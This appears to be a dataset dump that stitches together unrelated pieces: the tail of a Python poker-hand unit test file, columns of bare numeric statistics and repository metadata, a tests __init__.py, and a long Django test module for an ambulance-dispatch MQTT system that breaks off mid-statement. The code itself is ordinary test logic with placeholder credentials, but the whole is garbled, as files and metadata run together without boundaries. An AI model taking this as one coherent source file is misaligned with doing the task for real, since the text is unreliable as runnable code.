card2 = Card(DeckSuite.TILES, DeckValue.JACK)
card3 = Card(DeckSuite.HEARTS, DeckValue.JACK)
card4 = Card(DeckSuite.TILES, DeckValue.JACK)
card5 = Card(DeckSuite.PIKES, DeckValue.ACE)
self.assertTrue(HandsHelper.is_four_of_kind(card1, card2, card3, card4, card5))
def test_is_four_of_kind_should_return_false(self):
card1 = Card(DeckSuite.CLOVERS, DeckValue.JACK)
card2 = Card(DeckSuite.TILES, DeckValue.JACK)
card3 = Card(DeckSuite.HEARTS, DeckValue.JACK)
card4 = Card(DeckSuite.TILES, DeckValue.KING)
card5 = Card(DeckSuite.PIKES, DeckValue.ACE)
self.assertFalse(HandsHelper.is_four_of_kind(card1, card2, card3, card4, card5))
def test_is_full_house_should_return_true_for_three_and_two_cards_with_same_value(
self
):
card1 = Card(DeckSuite.CLOVERS, DeckValue.JACK)
card2 = Card(DeckSuite.PIKES, DeckValue.JACK)
card3 = Card(DeckSuite.HEARTS, DeckValue.JACK)
card4 = Card(DeckSuite.TILES, DeckValue.KING)
card5 = Card(DeckSuite.PIKES, DeckValue.KING)
self.assertTrue(HandsHelper.is_full_house(card1, card2, card3, card4, card5))
def test_is_full_house_should_return_false(self):
card1 = Card(DeckSuite.CLOVERS, DeckValue.JACK)
card2 = Card(DeckSuite.PIKES, DeckValue.ACE)
card3 = Card(DeckSuite.HEARTS, DeckValue.JACK)
card4 = Card(DeckSuite.TILES, DeckValue.KING)
card5 = Card(DeckSuite.PIKES, DeckValue.KING)
self.assertFalse(HandsHelper.is_full_house(card1, card2, card3, card4, card5))
def test_is_three_of_kind_should_return_true_for_three_cards_with_same_value(self):
card1 = Card(DeckSuite.CLOVERS, DeckValue.JACK)
card2 = Card(DeckSuite.PIKES, DeckValue.JACK)
card3 = Card(DeckSuite.HEARTS, DeckValue.JACK)
card4 = Card(DeckSuite.TILES, DeckValue.ACE)
card5 = Card(DeckSuite.PIKES, DeckValue.TWO)
self.assertTrue(HandsHelper.is_three_of_kind(card1, card2, card3, card4, card5))
def test_is_three_of_kind_should_return_false(self):
card1 = Card(DeckSuite.CLOVERS, DeckValue.JACK)
card2 = Card(DeckSuite.PIKES, DeckValue.KING)
card3 = Card(DeckSuite.HEARTS, DeckValue.JACK)
card4 = Card(DeckSuite.TILES, DeckValue.ACE)
card5 = Card(DeckSuite.PIKES, DeckValue.TWO)
self.assertFalse(
HandsHelper.is_three_of_kind(card1, card2, card3, card4, card5)
)
def test_is_two_pair_should_return_true_for_three_cards_with_same_value(self):
card1 = Card(DeckSuite.CLOVERS, DeckValue.JACK)
card2 = Card(DeckSuite.PIKES, DeckValue.JACK)
card3 = Card(DeckSuite.HEARTS, DeckValue.ACE)
card4 = Card(DeckSuite.TILES, DeckValue.ACE)
card5 = Card(DeckSuite.PIKES, DeckValue.TWO)
self.assertTrue(HandsHelper.is_two_pair(card1, card2, card3, card4, card5))
def test_is_two_pair_should_return_false(self):
card1 = Card(DeckSuite.CLOVERS, DeckValue.JACK)
card2 = Card(DeckSuite.PIKES, DeckValue.JACK)
card3 = Card(DeckSuite.HEARTS, DeckValue.ACE)
card4 = Card(DeckSuite.TILES, DeckValue.THREE)
card5 = Card(DeckSuite.PIKES, DeckValue.TWO)
self.assertFalse(HandsHelper.is_two_pair(card1, card2, card3, card4, card5))
def test_is_one_pair_should_return_true(self):
card1 = Card(DeckSuite.CLOVERS, DeckValue.JACK)
card2 = Card(DeckSuite.PIKES, DeckValue.JACK)
card3 = Card(DeckSuite.HEARTS, DeckValue.QUEEN)
card4 = Card(DeckSuite.TILES, DeckValue.THREE)
card5 = Card(DeckSuite.PIKES, DeckValue.ACE)
self.assertTrue(HandsHelper.is_one_pair(card1, card2, card3, card4, card5))
def test_is_one_pair_should_return_false(self):
card1 = Card(DeckSuite.CLOVERS, DeckValue.SEVEN)
card2 = Card(DeckSuite.PIKES, DeckValue.JACK)
card3 = Card(DeckSuite.HEARTS, DeckValue.QUEEN)
card4 = Card(DeckSuite.TILES, DeckValue.THREE)
card5 = Card(DeckSuite.PIKES, DeckValue.ACE)
self.assertFalse(HandsHelper.is_one_pair(card1, card2, card3, card4, card5))
| 49.793333
| 88
| 0.710135
| 919
| 7,469
| 5.576714
| 0.078346
| 0.21561
| 0.144
| 0.216
| 0.934634
| 0.870439
| 0.832585
| 0.83161
| 0.818537
| 0.811707
| 0
| 0.028463
| 0.190922
| 7,469
| 149
| 89
| 50.127517
| 0.819626
| 0
| 0
| 0.546154
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.130769
| 1
| 0.123077
| false
| 0
| 0.038462
| 0
| 0.169231
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
8590117659aa2bb7b92ed9d59023b9b3d4ccf719
| 194
|
py
|
Python
|
package/tests/__init__.py
|
dmoney/djangopackages
|
746cd47f8171229da3276b81d3c8454bdd887928
|
[
"MIT"
] | 383
|
2015-05-06T03:51:51.000Z
|
2022-03-26T07:56:44.000Z
|
package/tests/__init__.py
|
dmoney/djangopackages
|
746cd47f8171229da3276b81d3c8454bdd887928
|
[
"MIT"
] | 257
|
2017-04-17T08:31:16.000Z
|
2022-03-27T02:30:49.000Z
|
package/tests/__init__.py
|
dmoney/djangopackages
|
746cd47f8171229da3276b81d3c8454bdd887928
|
[
"MIT"
] | 105
|
2017-04-17T06:21:26.000Z
|
2022-03-30T05:24:19.000Z
|
# @@from package.tests.test_sourceforge import *
from .test_models import *
from package.tests.test_repos import *
from package.tests.test_utils import *
from package.tests.test_views import *
| 27.714286
| 48
| 0.798969
| 28
| 194
| 5.357143
| 0.357143
| 0.293333
| 0.426667
| 0.533333
| 0.52
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.113402
| 194
| 6
| 49
| 32.333333
| 0.872093
| 0.237113
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
859b868353c759822a467512985498a3778eda94
| 67,425
|
py
|
Python
|
mqtt/tests/test_calls.py
|
aschrist/WebServerAndClient
|
3aa0af2c444acac88a1b51b4cfd4bb8d0c36e640
|
[
"BSD-3-Clause"
] | null | null | null |
mqtt/tests/test_calls.py
|
aschrist/WebServerAndClient
|
3aa0af2c444acac88a1b51b4cfd4bb8d0c36e640
|
[
"BSD-3-Clause"
] | null | null | null |
mqtt/tests/test_calls.py
|
aschrist/WebServerAndClient
|
3aa0af2c444acac88a1b51b4cfd4bb8d0c36e640
|
[
"BSD-3-Clause"
] | null | null | null |
import json
import logging
from django.conf import settings
from django.utils import timezone
from ambulance.models import Ambulance, \
AmbulanceStatus, CallStatus, CallPriority, Call, AmbulanceCallStatus, LocationType, WaypointStatus
from ambulance.serializers import CallSerializer
from emstrack.tests.util import point2str
from hospital.models import Hospital
from equipment.models import EquipmentItem
from login.models import Client, ClientStatus, ClientLog
from .client import MQTTTestCase, MQTTTestClient, TestMQTT
from ..subscribe import SubscribeClient
logger = logging.getLogger(__name__)
# TODO: test that started_at, pending_at and ended_at get actually set in calls
# TODO: test that Call.abort() terminates a call properly in every stage of the call
class TestMQTTCalls(TestMQTT, MQTTTestCase):
def test(self, username=settings.MQTT['USERNAME'], password=settings.MQTT['PASSWORD'], ambulance_id=None):
if not ambulance_id:
ambulance_id = self.a1.id
# Start client as admin
broker = {
'HOST': 'localhost',
'PORT': 1883,
'KEEPALIVE': 60,
'CLEAN_SESSION': True
}
# Start subscribe client
broker.update(settings.MQTT)
broker['CLIENT_ID'] = 'test_mqttclient'
subscribe_client = SubscribeClient(broker,
debug=True)
self.is_connected(subscribe_client)
self.is_subscribed(subscribe_client)
# Start test client
broker.update(settings.MQTT)
client_id = 'test_mqtt_subscribe_admin'
broker['USERNAME'] = username
broker['PASSWORD'] = password
broker['CLIENT_ID'] = client_id
test_client = MQTTTestClient(broker,
check_payload=False,
debug=True)
self.is_connected(test_client)
# Client handshake
test_client.publish('user/{}/client/{}/status'.format(username, client_id), 'online')
# process messages
self.loop(test_client)
subscribe_client.loop()
# check record
clnt = Client.objects.get(client_id=client_id)
self.assertEqual(clnt.status, ClientStatus.O.name)
# check record log
obj = ClientLog.objects.get(client=clnt)
self.assertEqual(obj.status, ClientStatus.O.name)
# Ambulance handshake: ambulance login
test_client.publish('user/{}/client/{}/ambulance/{}/status'.format(username, client_id, ambulance_id),
'ambulance login')
# process messages
self.loop(test_client)
subscribe_client.loop()
# check record
clnt = Client.objects.get(client_id=client_id)
self.assertEqual(clnt.status, ClientStatus.O.name)
self.assertEqual(clnt.ambulance.id, ambulance_id)
# subscribe to call and ambulance call status
test_client.expect('ambulance/{}/call/+/status'.format(ambulance_id))
self.is_subscribed(test_client)
# create call using serializer, one ambulance first
call = {
'status': CallStatus.P.name,
'priority': CallPriority.B.name,
'ambulancecall_set': [
{
'ambulance_id': ambulance_id,
'waypoint_set': [
{
'order': 0,
'location': {
'type': LocationType.i.name,
'number': '123',
'street': 'asdasdasd asd asd asdas'
}
}
]
}
],
'patient_set': [{'name': 'Jose', 'age': 3}, {'name': 'Maria', 'age': 10}]
}
serializer = CallSerializer(data=call)
serializer.is_valid()
call = serializer.save(updated_by=self.u1)
# process messages
self.loop(test_client)
subscribe_client.loop()
# Check if call status is Pending
call = Call.objects.get(id=call.id)
self.assertEqual(call.status, CallStatus.P.name)
# Check if ambulancecall status is Requested
ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id)
self.assertEqual(ambulancecall.status, AmbulanceCallStatus.R.name)
# test_client publishes client_id to location_client
test_client.publish('user/{}/client/{}/ambulance/{}/data'.format(username, client_id, ambulance_id),
json.dumps({
'location_client_id': client_id,
}))
# process messages
self.loop(test_client)
subscribe_client.loop()
# test_client publishes "Accepted" to call status
test_client.publish('user/{}/client/{}/ambulance/{}/call/{}/status'.format(username, client_id,
ambulance_id, call.id), AmbulanceCallStatus.A.value.casefold())
# process messages
self.loop(test_client)
subscribe_client.loop()
# expect ambulance call status
test_client.expect('ambulance/{}/call/+/status'.format(ambulance_id))
self.is_subscribed(test_client)
# process messages
self.loop(test_client)
subscribe_client.loop()
# Check if call status changed to Started
call = Call.objects.get(id=call.id)
self.assertEqual(call.status, CallStatus.S.name)
# Check if ambulancecall status changed to accepted
ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id)
self.assertEqual(ambulancecall.status, AmbulanceCallStatus.A.name)
# subscribe to call and ambulance call status
test_client.expect('call/{}/data'.format(call.id))
self.is_subscribed(test_client)
# test_client publishes "patient bound" to status
test_client.publish('user/{}/client/{}/ambulance/{}/data'.format(username, client_id, ambulance_id),
json.dumps({
'status': AmbulanceStatus.PB.name,
}))
# process messages
self.loop(test_client)
subscribe_client.loop()
# test_client publishes "at patient" to status
test_client.publish('user/{}/client/{}/ambulance/{}/data'.format(username, client_id, ambulance_id),
json.dumps({
'status': AmbulanceStatus.AP.name,
}))
# process messages
self.loop(test_client)
subscribe_client.loop()
# test_client publishes "hospital bound" to status
test_client.publish('user/{}/client/{}/ambulance/{}/data'.format(username, client_id, ambulance_id),
json.dumps({
'status': AmbulanceStatus.HB.name,
}))
# process messages
self.loop(test_client)
subscribe_client.loop()
# test_client publishes "at hospital" to status
test_client.publish('user/{}/client/{}/ambulance/{}/data'.format(username, client_id, ambulance_id),
json.dumps({
'status': AmbulanceStatus.AH.name,
}))
# process messages
self.loop(test_client)
subscribe_client.loop()
# test_client publishes new waypoint
test_client.publish('user/{}/client/{}/ambulance/{}/call/{}/waypoint/{}/data'.format(username, client_id,
ambulance_id, call.id, -1),
json.dumps({
'order': 2,
'location': {
'type': LocationType.w.name
}
}))
# process messages
self.loop(test_client)
subscribe_client.loop()
# has the waypoint been created?
waypoint_set = ambulancecall.waypoint_set.all()
self.assertEqual(len(waypoint_set), 2)
# subscribe to call and ambulance call status
test_client.expect('call/{}/data'.format(ambulance_id))
self.is_subscribed(test_client)
# process messages
self.loop(test_client)
subscribe_client.loop()
# test_client updates waypoint
waypoint = waypoint_set.get(order=2)
test_client.publish('user/{}/client/{}/ambulance/{}/call/{}/waypoint/{}/data'.format(username, client_id,
ambulance_id, call.id,
waypoint.id),
json.dumps({
'order': 1,
'status': WaypointStatus.V.name
}))
# process messages
self.loop(test_client)
subscribe_client.loop()
# has the waypoint been created?
waypoint = ambulancecall.waypoint_set.all()
self.assertEqual(len(waypoint), 2)
# subscribe to call and ambulance call status
test_client.expect('call/{}/data'.format(ambulance_id))
self.is_subscribed(test_client)
# process messages
self.loop(test_client)
subscribe_client.loop()
# test_client publishes "completed" to call status
test_client.publish('user/{}/client/{}/ambulance/{}/call/{}/status'.format(username, client_id,
ambulance_id, call.id),
AmbulanceCallStatus.C.value.casefold())
# process messages
self.loop(test_client)
subscribe_client.loop()
# Check if ambulancecall status is Completed
ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id)
self.assertEqual(ambulancecall.status, AmbulanceCallStatus.C.name)
# Check if call status is Ended
call = Call.objects.get(id=call.id)
self.assertEqual(call.status, CallStatus.E.name)
# expect status ended call
test_client.expect('call/{}/data'.format(call.id))
self.is_subscribed(test_client)
# expect blank call
test_client.expect('call/{}/data'.format(call.id))
self.is_subscribed(test_client)
# expect status completed ambulancecall
test_client.expect('ambulance/{}/call/+/status'.format(ambulance_id))
self.is_subscribed(test_client)
# expect blank ambulancecall
test_client.expect('ambulance/{}/call/+/status'.format(ambulance_id))
self.is_subscribed(test_client)
# Client handshake
test_client.publish('user/{}/client/{}/status'.format(username, client_id), 'offline')
# process messages
self.loop(test_client)
subscribe_client.loop()
# wait for disconnect
test_client.wait()
subscribe_client.wait()
class TestMQTTCallsRegularUser(TestMQTTCalls):
def test(self):
super().test('testuser2', 'very_secret', self.a3.id)
# -------------------------------------------------------------------------------------------
# New Testing
# Test aborting the call once the call is created.
class TestMQTTCallsAbort(TestMQTT, MQTTTestCase):
def test(self, username=settings.MQTT['USERNAME'], password=settings.MQTT['PASSWORD'], ambulance_id=None):
if not ambulance_id:
ambulance_id = self.a1.id
# Start client as admin
broker = {
'HOST': 'localhost',
'PORT': 1883,
'KEEPALIVE': 60,
'CLEAN_SESSION': True
}
# Start subscribe client
broker.update(settings.MQTT)
broker['CLIENT_ID'] = 'test_mqttclient'
subscribe_client = SubscribeClient(broker,
debug=True)
self.is_connected(subscribe_client)
self.is_subscribed(subscribe_client)
# Start test client
broker.update(settings.MQTT)
client_id = 'test_mqtt_subscribe_admin'
broker['USERNAME'] = username
broker['PASSWORD'] = password
broker['CLIENT_ID'] = client_id
test_client = MQTTTestClient(broker,
check_payload=False,
debug=True)
self.is_connected(test_client)
# Client handshake
test_client.publish('user/{}/client/{}/status'.format(username, client_id), 'online')
# process messages
self.loop(test_client)
subscribe_client.loop()
# check record
clnt = Client.objects.get(client_id=client_id)
self.assertEqual(clnt.status, ClientStatus.O.name)
# check record log
obj = ClientLog.objects.get(client=clnt)
self.assertEqual(obj.status, ClientStatus.O.name)
# Ambulance handshake: ambulance login
test_client.publish('user/{}/client/{}/ambulance/{}/status'.format(username, client_id, ambulance_id),
'ambulance login')
# process messages
self.loop(test_client)
subscribe_client.loop()
# check record
clnt = Client.objects.get(client_id=client_id)
self.assertEqual(clnt.status, ClientStatus.O.name)
self.assertEqual(clnt.ambulance.id, ambulance_id)
# subscribe to call and ambulance call status
test_client.expect('ambulance/{}/call/+/status'.format(ambulance_id))
self.is_subscribed(test_client)
# create call using serializer, one ambulance first
call = {
'status': CallStatus.P.name,
'priority': CallPriority.B.name,
'number': '123',
'street': 'asdasdasd asd asd asdas',
'ambulancecall_set': [{'ambulance_id': ambulance_id}],
'patient_set': [{'name': 'Jose', 'age': 3}, {'name': 'Maria', 'age': 10}]
}
serializer = CallSerializer(data=call)
serializer.is_valid()
call = serializer.save(updated_by=self.u1)
# process messages
self.loop(test_client)
subscribe_client.loop()
# Check if call status is Pending
call = Call.objects.get(id=call.id)
self.assertEqual(call.status, CallStatus.P.name)
# Check if ambulancecall status is Requested
ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id)
self.assertEqual(ambulancecall.status, AmbulanceCallStatus.R.name)
# test_client publishes client_id to location_client
test_client.publish('user/{}/client/{}/ambulance/{}/data'.format(username, client_id, ambulance_id),
json.dumps({
'location_client_id': client_id,
}))
# process messages
self.loop(test_client)
subscribe_client.loop()
# subscribe to call and ambulance call status
test_client.expect('call/{}/data'.format(call.id))
self.is_subscribed(test_client)
# process messages
self.loop(test_client)
subscribe_client.loop()
# expect status ended call
test_client.expect('call/{}/data'.format(call.id))
self.is_subscribed(test_client)
# expect blank call
test_client.expect('call/{}/data'.format(call.id))
self.is_subscribed(test_client)
# expect status completed ambulancecall
test_client.expect('ambulance/{}/call/+/status'.format(ambulance_id))
self.is_subscribed(test_client)
# expect blank ambulancecall
test_client.expect('ambulance/{}/call/+/status'.format(ambulance_id))
self.is_subscribed(test_client)
# Abort the call
call.abort()
# process messages
self.loop(test_client, subscribe_client)
# Check if ambulancecall status is Completed
ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id)
self.assertEqual(ambulancecall.status, AmbulanceCallStatus.C.name)
# Check if call status is Ended
call = Call.objects.get(id=call.id)
self.assertEqual(call.status, CallStatus.E.name)
# Client handshake
test_client.publish('user/{}/client/{}/status'.format(username, client_id), 'offline')
# process messages
self.loop(test_client)
subscribe_client.loop()
# wait for disconnect
test_client.wait()
subscribe_client.wait()
class TestMQTTCallsDecline(TestMQTT, MQTTTestCase):
def test(self, username=settings.MQTT['USERNAME'], password=settings.MQTT['PASSWORD'], ambulance_id=None):
if not ambulance_id:
ambulance_id = self.a1.id
# Start client as admin
broker = {
'HOST': 'localhost',
'PORT': 1883,
'KEEPALIVE': 60,
'CLEAN_SESSION': True
}
# Start subscribe client
broker.update(settings.MQTT)
broker['CLIENT_ID'] = 'test_mqttclient'
subscribe_client = SubscribeClient(broker,
debug=True)
self.is_connected(subscribe_client)
self.is_subscribed(subscribe_client)
# Start test client
broker.update(settings.MQTT)
client_id = 'test_mqtt_subscribe_admin'
broker['USERNAME'] = username
broker['PASSWORD'] = password
broker['CLIENT_ID'] = client_id
test_client = MQTTTestClient(broker,
check_payload=False,
debug=True)
self.is_connected(test_client)
# Client handshake
test_client.publish('user/{}/client/{}/status'.format(username, client_id), 'online')
# process messages
self.loop(test_client)
subscribe_client.loop()
# check record
clnt = Client.objects.get(client_id=client_id)
self.assertEqual(clnt.status, ClientStatus.O.name)
# check record log
obj = ClientLog.objects.get(client=clnt)
self.assertEqual(obj.status, ClientStatus.O.name)
# Ambulance handshake: ambulance login
test_client.publish('user/{}/client/{}/ambulance/{}/status'.format(username, client_id, ambulance_id),
'ambulance login')
# process messages
self.loop(test_client)
subscribe_client.loop()
# check record
clnt = Client.objects.get(client_id=client_id)
self.assertEqual(clnt.status, ClientStatus.O.name)
self.assertEqual(clnt.ambulance.id, ambulance_id)
# subscribe to call and ambulance call status
test_client.expect('ambulance/{}/call/+/status'.format(ambulance_id))
self.is_subscribed(test_client)
# create call using serializer, one ambulance first
call = {
'status': CallStatus.P.name,
'priority': CallPriority.B.name,
'number': '123',
'street': 'asdasdasd asd asd asdas',
'ambulancecall_set': [
{
'ambulance_id': ambulance_id,
'waypoint_set': [
{
'order': 0,
'location': {
'type': LocationType.i.name,
'number': '123',
'street': 'asdasdasd asd asd asdas'
}
}
]
}
],
'patient_set': [{'name': 'Jose', 'age': 3}, {'name': 'Maria', 'age': 10}]
}
serializer = CallSerializer(data=call)
serializer.is_valid()
call = serializer.save(updated_by=self.u1)
# process messages
self.loop(test_client)
subscribe_client.loop()
# Check if call status is Pending
call = Call.objects.get(id=call.id)
self.assertEqual(call.status, CallStatus.P.name)
# Check if ambulancecall status is Requested
ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id)
self.assertEqual(ambulancecall.status, AmbulanceCallStatus.R.name)
# test_client publishes client_id to location_client
test_client.publish('user/{}/client/{}/ambulance/{}/data'.format(username, client_id, ambulance_id),
json.dumps({
'location_client_id': client_id,
}))
# process messages
self.loop(test_client)
subscribe_client.loop()
# test_client publishes "Declined" to call status
test_client.publish('user/{}/client/{}/ambulance/{}/call/{}/status'.format(username, client_id,
ambulance_id, call.id), AmbulanceCallStatus.D.value.casefold())
# process messages
self.loop(test_client)
subscribe_client.loop()
# Expect ambulance call status to go declined
test_client.expect('ambulance/{}/call/+/status'.format(ambulance_id))
self.is_subscribed(test_client)
# process messages
self.loop(test_client)
subscribe_client.loop()
# Check if call status is Pending
call = Call.objects.get(id=call.id)
self.assertEqual(call.status, CallStatus.P.name)
# Check if ambulancecall status is Declined
ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id)
self.assertEqual(ambulancecall.status, AmbulanceCallStatus.D.name)
# test_client publishes "Accepted" to call status
test_client.publish('user/{}/client/{}/ambulance/{}/call/{}/status'.format(username, client_id,
ambulance_id, call.id), AmbulanceCallStatus.A.value.casefold())
# process messages
self.loop(test_client)
subscribe_client.loop()
# subscribe to call and ambulance call status
test_client.expect('ambulance/{}/call/+/status'.format(ambulance_id))
self.is_subscribed(test_client)
# process messages
self.loop(test_client)
subscribe_client.loop()
# Check if call status changed to Started
call = Call.objects.get(id=call.id)
self.assertEqual(call.status, CallStatus.S.name)
# Check if ambulancecall status changed to accepted
ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id)
self.assertEqual(ambulancecall.status, AmbulanceCallStatus.A.name)
# subscribe to call and ambulance call status
test_client.expect('call/{}/data'.format(call.id))
self.is_subscribed(test_client)
# test_client publishes "completed" to call status
test_client.publish('user/{}/client/{}/ambulance/{}/call/{}/status'.format(username, client_id,
ambulance_id, call.id),
AmbulanceCallStatus.C.value.casefold())
# process messages
self.loop(test_client)
subscribe_client.loop()
# Check if ambulancecall status is Completed
ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id)
self.assertEqual(ambulancecall.status, AmbulanceCallStatus.C.name)
# Check if call status is Ended
call = Call.objects.get(id=call.id)
self.assertEqual(call.status, CallStatus.E.name)
# expect status ended call
test_client.expect('call/{}/data'.format(call.id))
self.is_subscribed(test_client)
# expect blank call
test_client.expect('call/{}/data'.format(call.id))
self.is_subscribed(test_client)
# expect status completed ambulancecall
test_client.expect('ambulance/{}/call/+/status'.format(ambulance_id))
self.is_subscribed(test_client)
# expect blank ambulancecall
test_client.expect('ambulance/{}/call/+/status'.format(ambulance_id))
self.is_subscribed(test_client)
# Client handshake
test_client.publish('user/{}/client/{}/status'.format(username, client_id), 'offline')
# process messages
self.loop(test_client)
subscribe_client.loop()
# wait for disconnect
test_client.wait()
subscribe_client.wait()
class TestMQTTCallsDeclineRegularUser(TestMQTTCallsDecline):
def test(self):
super().test('testuser2', 'very_secret', self.a3.id)
class TestMQTTCallsDeclineInTheMiddle(TestMQTT, MQTTTestCase):
def test(self, username=settings.MQTT['USERNAME'], password=settings.MQTT['PASSWORD'], ambulance_id=None):
if not ambulance_id:
ambulance_id = self.a1.id
# Start client as admin
broker = {
'HOST': 'localhost',
'PORT': 1883,
'KEEPALIVE': 60,
'CLEAN_SESSION': True
}
# Start subscribe client
broker.update(settings.MQTT)
broker['CLIENT_ID'] = 'test_mqttclient'
subscribe_client = SubscribeClient(broker,
debug=True)
self.is_connected(subscribe_client)
self.is_subscribed(subscribe_client)
# Start test client
broker.update(settings.MQTT)
client_id = 'test_mqtt_subscribe_admin'
broker['USERNAME'] = username
broker['PASSWORD'] = password
broker['CLIENT_ID'] = client_id
test_client = MQTTTestClient(broker,
check_payload=False,
debug=True)
self.is_connected(test_client)
# Client handshake
test_client.publish('user/{}/client/{}/status'.format(username, client_id), 'online')
# process messages
self.loop(test_client)
subscribe_client.loop()
# check record
clnt = Client.objects.get(client_id=client_id)
self.assertEqual(clnt.status, ClientStatus.O.name)
# check record log
obj = ClientLog.objects.get(client=clnt)
self.assertEqual(obj.status, ClientStatus.O.name)
# Ambulance handshake: ambulance login
test_client.publish('user/{}/client/{}/ambulance/{}/status'.format(username, client_id, ambulance_id),
'ambulance login')
# process messages
self.loop(test_client)
subscribe_client.loop()
# check record
clnt = Client.objects.get(client_id=client_id)
self.assertEqual(clnt.status, ClientStatus.O.name)
self.assertEqual(clnt.ambulance.id, ambulance_id)
# subscribe to call and ambulance call status
test_client.expect('ambulance/{}/call/+/status'.format(ambulance_id))
self.is_subscribed(test_client)
# create call using serializer, one ambulance first
call = {
'status': CallStatus.P.name,
'priority': CallPriority.B.name,
'ambulancecall_set': [
{
'ambulance_id': ambulance_id,
'waypoint_set': [
{
'order': 0,
'location': {
'type': LocationType.i.name,
'number': '123',
'street': 'asdasdasd asd asd asdas'
}
}
]
}
],
'patient_set': [{'name': 'Jose', 'age': 3}, {'name': 'Maria', 'age': 10}]
}
serializer = CallSerializer(data=call)
serializer.is_valid()
call = serializer.save(updated_by=self.u1)
# process messages
self.loop(test_client)
subscribe_client.loop()
# Check if call status is Pending
call = Call.objects.get(id=call.id)
self.assertEqual(call.status, CallStatus.P.name)
# Check if ambulancecall status is Requested
ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id)
self.assertEqual(ambulancecall.status, AmbulanceCallStatus.R.name)
# test_client publishes client_id to location_client
test_client.publish('user/{}/client/{}/ambulance/{}/data'.format(username, client_id, ambulance_id),
json.dumps({
'location_client_id': client_id,
}))
# process messages
self.loop(test_client)
subscribe_client.loop()
# subscribe to call and ambulance call status
test_client.expect('call/{}/data'.format(call.id))
self.is_subscribed(test_client)
# process messages
self.loop(test_client)
subscribe_client.loop()
# test_client publishes "Declined" to call status
test_client.publish('user/{}/client/{}/ambulance/{}/call/{}/status'.format(username, client_id,
ambulance_id, call.id), AmbulanceCallStatus.D.value.casefold())
# process messages
self.loop(test_client)
subscribe_client.loop()
# expect call update
test_client.expect('call/{}/data'.format(call.id))
self.is_subscribed(test_client)
# Expect ambulance call status to go declined
test_client.expect('ambulance/{}/call/+/status'.format(ambulance_id))
self.is_subscribed(test_client)
# process messages
self.loop(test_client)
subscribe_client.loop()
# Check if call status is Pending
call = Call.objects.get(id=call.id)
self.assertEqual(call.status, CallStatus.P.name)
# Check if ambulancecall status is Declined
ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id)
self.assertEqual(ambulancecall.status, AmbulanceCallStatus.D.name)
# expect status ended call
test_client.expect('call/{}/data'.format(call.id))
self.is_subscribed(test_client)
# expect blank call
test_client.expect('call/{}/data'.format(call.id))
self.is_subscribed(test_client)
# expect status completed ambulancecall
test_client.expect('ambulance/{}/call/+/status'.format(ambulance_id))
self.is_subscribed(test_client)
# expect blank ambulancecall
test_client.expect('ambulance/{}/call/+/status'.format(ambulance_id))
self.is_subscribed(test_client)
# Abort call
call.abort()
# process messages
self.loop(test_client, subscribe_client)
# Check if ambulancecall status is Completed
ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id)
self.assertEqual(ambulancecall.status, AmbulanceCallStatus.C.name)
# Check if call status is Ended
call = Call.objects.get(id=call.id)
self.assertEqual(call.status, CallStatus.E.name)
# Client handshake
test_client.publish('user/{}/client/{}/status'.format(username, client_id), 'offline')
# process messages
self.loop(test_client)
subscribe_client.loop()
# wait for disconnect
test_client.wait()
subscribe_client.wait()
class TestMQTTCallsDeclineInTheMiddleRegularUser(TestMQTTCallsDeclineInTheMiddle):
def test(self):
super().test('testuser2', 'very_secret', self.a3.id)
class TestMQTTCallsMultipleAmbulances(TestMQTT, MQTTTestCase):
def test(self, username=settings.MQTT['USERNAME'], password=settings.MQTT['PASSWORD'],
ambulance_id1=None, ambulance_id2=None):
if not ambulance_id1:
ambulance_id1 = self.a1.id
if not ambulance_id2:
ambulance_id2 = self.a3.id
# Start client as admin
broker = {
'HOST': 'localhost',
'PORT': 1883,
'KEEPALIVE': 60,
'CLEAN_SESSION': True
}
# Start subscribe client
broker.update(settings.MQTT)
broker['CLIENT_ID'] = 'test_mqttclient'
subscribe_client = SubscribeClient(broker,
debug=True)
self.is_connected(subscribe_client)
self.is_subscribed(subscribe_client)
# Start test client
broker.update(settings.MQTT)
client_id = 'test_mqtt_subscribe_admin'
broker['USERNAME'] = username
broker['PASSWORD'] = password
broker['CLIENT_ID'] = client_id
test_client = MQTTTestClient(broker,
check_payload=False,
debug=True)
self.is_connected(test_client)
# Client handshake
test_client.publish('user/{}/client/{}/status'.format(username, client_id), 'online')
# process messages
self.loop(test_client)
subscribe_client.loop()
# check record
clnt = Client.objects.get(client_id=client_id)
self.assertEqual(clnt.status, ClientStatus.O.name)
# check record log
obj = ClientLog.objects.get(client=clnt)
self.assertEqual(obj.status, ClientStatus.O.name)
# Ambulance handshake: ambulance login
test_client.publish('user/{}/client/{}/ambulance/{}/status'.format(username, client_id, ambulance_id1),
'ambulance login')
# process messages
self.loop(test_client)
subscribe_client.loop()
# check record
clnt = Client.objects.get(client_id=client_id)
self.assertEqual(clnt.status, ClientStatus.O.name)
self.assertEqual(clnt.ambulance.id, ambulance_id1)
# subscribe to call and ambulance call status
test_client.expect('ambulance/{}/call/+/status'.format(ambulance_id1))
self.is_subscribed(test_client)
# create call using serializer, one ambulance first
call = {
